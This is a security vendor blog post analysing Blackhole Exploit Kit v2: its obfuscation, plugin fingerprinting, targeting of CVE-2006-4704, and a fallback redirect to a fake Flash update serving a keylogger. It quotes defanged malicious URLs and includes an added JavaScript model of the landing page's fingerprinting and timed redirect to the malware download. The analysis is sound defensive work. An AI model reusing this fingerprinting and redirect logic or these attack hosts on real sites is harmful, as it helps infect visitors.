It should come as no surprise that attackers are upgrading their Blackhole exploit kits to a new and more powerful version. Blackhole Exploit Kit v2 has now been released, and we are starting to see this latest version being adopted in the wild.
v2 differs from v1 in many ways. Numerous enhancements have been made to ensure that the exploit kit remains undetected in the wild. Some of the key enhancements include:
- The URL format is dynamic. It no longer follows a fixed pattern as the version 1.0 URLs did, which undermines simple URL-based signatures.
- Executables delivered as the malicious payload are now protected from multiple downloads, so a payload cannot simply be re-fetched from the same URL for analysis.
Heavy obfuscation of the code continues as it did in the prior version. Like Blackhole Exploit Kit v1, v2 also continues to target known vulnerabilities in Internet Explorer (IE), Adobe products and Java. A sample of raw Blackhole Exploit Kit v2 code can be seen from the following recent infection:
Exploit Kit URL : hxxp://anygutterking.com/links/assure_numb_engineers.php
In the screenshots above, you will note the highly obfuscated JavaScript loaded in the browser.
Deobfuscating the code makes analysis much easier. While we leverage a proprietary tool built in house for this purpose, you can also use tools like Malzilla and Jsunpack, or attempt to deobfuscate the code manually.
The deobfuscated code shown below is divided into two parts for easier understanding.
- Browser plugin/component detection
The code shown in the screenshot detects the installed plug-ins and ActiveX components by scanning the browser DOM. By identifying the versions of the installed plugins/components, the exploit kit can select only those exploits for known vulnerabilities that actually apply to the victim's browser, rather than firing every exploit blindly.
- Attacking the vulnerabilities
In this case, a well-known vulnerability (CVE-2006-4704) in the WMI Object Broker ActiveX control shipped with Microsoft Visual Studio 2005 was targeted. For more information about this vulnerability, see our detailed blog post on it. This vulnerability was also targeted by Blackhole v1 and by other exploit kits such as the Incognito exploit kit.

At the end of the code, we see a redirect request to “hxxp://o.casasferiasacores.net/adobe/update_flash_player.exe”. This is a new addition to the exploit code in this version. If the victim's browser is patched and none of the vulnerabilities could be exploited, this redirection still gives the attacker one last chance to compromise the victim's machine. The variable “end_redirect” highlighted in the screenshot above is passed to setTimeout; after 60 seconds the page is redirected to the aforementioned link, which is a fake Adobe Flash update page. Note that, unlike the exploits, this fallback is pure social engineering: nothing runs unless the user chooses to download and execute the file. This combination of silent exploitation with a social-engineering fallback is typical of drive-by download attacks. Once redirected to this page, the user is prompted to download an .exe file labeled “update_flash_player.exe”.
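To make the two parts of the deobfuscated landing page concrete, here is an added example in JavaScript (not the kit's code and not from the original post) that models them: first the plugin/component fingerprinting from the browser's plugin list and, for IE, ActiveX instantiation probes; then the decision of whether an applicable exploit exists, falling back to the timed redirect to the fake Flash update page when none does. The navigator and window objects, the plugin strings, the version cut-offs and the ActiveX ProgID are constructed or assumed for offline use; in particular the cut-offs are arbitrary placeholders, not real vulnerable-version boundaries.

```javascript
// Added illustration (not the kit's code, not from the original post): a
// simplified model of a deobfuscated Blackhole-style landing page.
// Part 1: fingerprint installed components from navigator.plugins and, on IE,
// from ActiveX ProgID probes. Part 2: select a target, or schedule the 60 s
// fallback redirect to the social-engineering page when nothing applies.
// All navigator/window objects, plugin strings, cut-offs and ProgIDs below
// are constructed for offline use.

// Pull a 4-part numeric version out of a plugin name/description.
// "1.6.0_31" -> [1,6,0,31]; "11.3 r300" -> [11,3,0,300]; "10.1.4" -> [10,1,4,0]
function extractVersion(text) {
  let m = text.match(/(\d+)\.(\d+)\.(\d+)[._](\d+)/);
  if (m) return m.slice(1, 5).map(Number);
  m = text.match(/(\d+)\.(\d+)(?:\.(\d+))?(?:\s*r(\d+))?/);
  if (m) return [m[1], m[2], m[3] || 0, m[4] || 0].map(Number);
  return null;
}

// Lexicographic compare of two 4-part version arrays: -1, 0 or 1.
function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Plugin-name patterns for the component families the kit cares about.
const PLUGIN_FAMILIES = [
  { key: 'java',   re: /java/i },
  { key: 'flash',  re: /shockwave flash/i },
  { key: 'reader', re: /adobe (acrobat|pdf)/i },
];

// Part 1a: walk navigator.plugins and keep the highest version per family.
function fingerprintPlugins(nav) {
  const found = {};
  const plugins = nav.plugins || [];
  for (let i = 0; i < plugins.length; i++) {
    const p = plugins[i];
    const text = (p.name || '') + ' ' + (p.description || '');
    for (const fam of PLUGIN_FAMILIES) {
      if (!fam.re.test(p.name || '')) continue;
      const v = extractVersion(text);
      if (v && (!found[fam.key] || compareVersions(v, found[fam.key]) > 0)) {
        found[fam.key] = v;
      }
    }
  }
  return found;
}

// Part 1b: on IE, a ProgID that instantiates without throwing is present.
function probeActiveX(win, progIds) {
  const present = [];
  if (typeof win.ActiveXObject !== 'function') return present;
  for (const id of progIds) {
    try { new win.ActiveXObject(id); present.push(id); } catch (e) { /* absent */ }
  }
  return present;
}

// Part 2: a present ActiveX control wins; otherwise a component whose version
// is at or below its (illustrative, made-up) cut-off is treated as targetable.
function selectTarget(fp, activeX, vulnerableUpTo) {
  if (activeX.length > 0) return 'activex:' + activeX[0];
  for (const key of Object.keys(vulnerableUpTo)) {
    if (fp[key] && compareVersions(fp[key], vulnerableUpTo[key]) <= 0) {
      return 'plugin:' + key;
    }
  }
  return null;
}

// Fallback: after delayMs, send the browser to the fake update page.
function scheduleFallback(win, url, delayMs) {
  return win.setTimeout(function () { win.location.href = url; }, delayMs);
}

// Constructed sample environment: Firefox-like plugin list, no ActiveX.
const sampleNavigator = {
  plugins: [
    { name: 'Shockwave Flash', description: 'Shockwave Flash 11.3 r300' },
    { name: 'Java(TM) Platform SE 6 U31',
      description: 'Next Generation Java Plug-in 1.6.0_31 for Mozilla browsers' },
    { name: 'Adobe Acrobat',
      description: 'Adobe PDF Plug-In For Firefox and Netscape 10.1.4' },
  ],
};

// Fake window whose setTimeout fires immediately and records the delay, so
// the redirect can be observed without waiting 60 seconds.
function makeFakeWindow() {
  const win = { location: { href: 'about:blank' }, lastDelay: null };
  win.setTimeout = function (fn, ms) { win.lastDelay = ms; fn(); return 1; };
  return win;
}

// Placeholder cut-offs only; they do not correspond to real CVE boundaries.
const ILLUSTRATIVE_CUTOFFS = { java: [1, 6, 0, 30], flash: [11, 2, 0, 0], reader: [9, 9, 9, 9] };
// ProgID assumed for illustration; verify against the deobfuscated sample.
const PROBED_PROGIDS = ['WMIScriptUtils.WMIObjectBroker2'];
// Defanged URL as quoted in the post above.
const FALLBACK_URL = 'hxxp://o.casasferiasacores.net/adobe/update_flash_player.exe';

function runLandingPage(nav, win) {
  const fp = fingerprintPlugins(nav);
  const ax = probeActiveX(win, PROBED_PROGIDS);
  const target = selectTarget(fp, ax, ILLUSTRATIVE_CUTOFFS);
  if (target === null) scheduleFallback(win, FALLBACK_URL, 60000);
  return { fingerprint: fp, target: target };
}
```

Running `runLandingPage(sampleNavigator, makeFakeWindow())` yields no target for the sample environment (every component is newer than its placeholder cut-off), so the fallback fires and the fake window's `location.href` becomes the redirect URL. Swap in an older Java entry and the fingerprint step selects `plugin:java` instead, with no redirect scheduled.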
Screenshot of the fake Adobe page hosted on the malicious domain:
The VirusTotal report shows that currently only 3/43 AV vendors flag this file as malicious. The ThreatExpert report for the same file came back as expected: it assigned the file the highest severity level, and its analysis indicators place the binary in the ‘keylogger’ family. The file also connects to the Internet and downloads additional executables.
Screenshot of the ThreatExpert report:
Exploit kits are becoming smarter day by day, which keeps security vendors on their toes in the effort to combat new attacks. Fortunately, the cloud infrastructure at Zscaler gives us the flexibility to quickly add new detections as needed.
With Blackhole Exploit Kit v1, we saw an increase in malicious domains hosting exploit kit URLs as the kit matured over time. With the latest version being more sophisticated, we expect to see even more rapid growth of Blackhole Exploit Kit v2.
Pradeep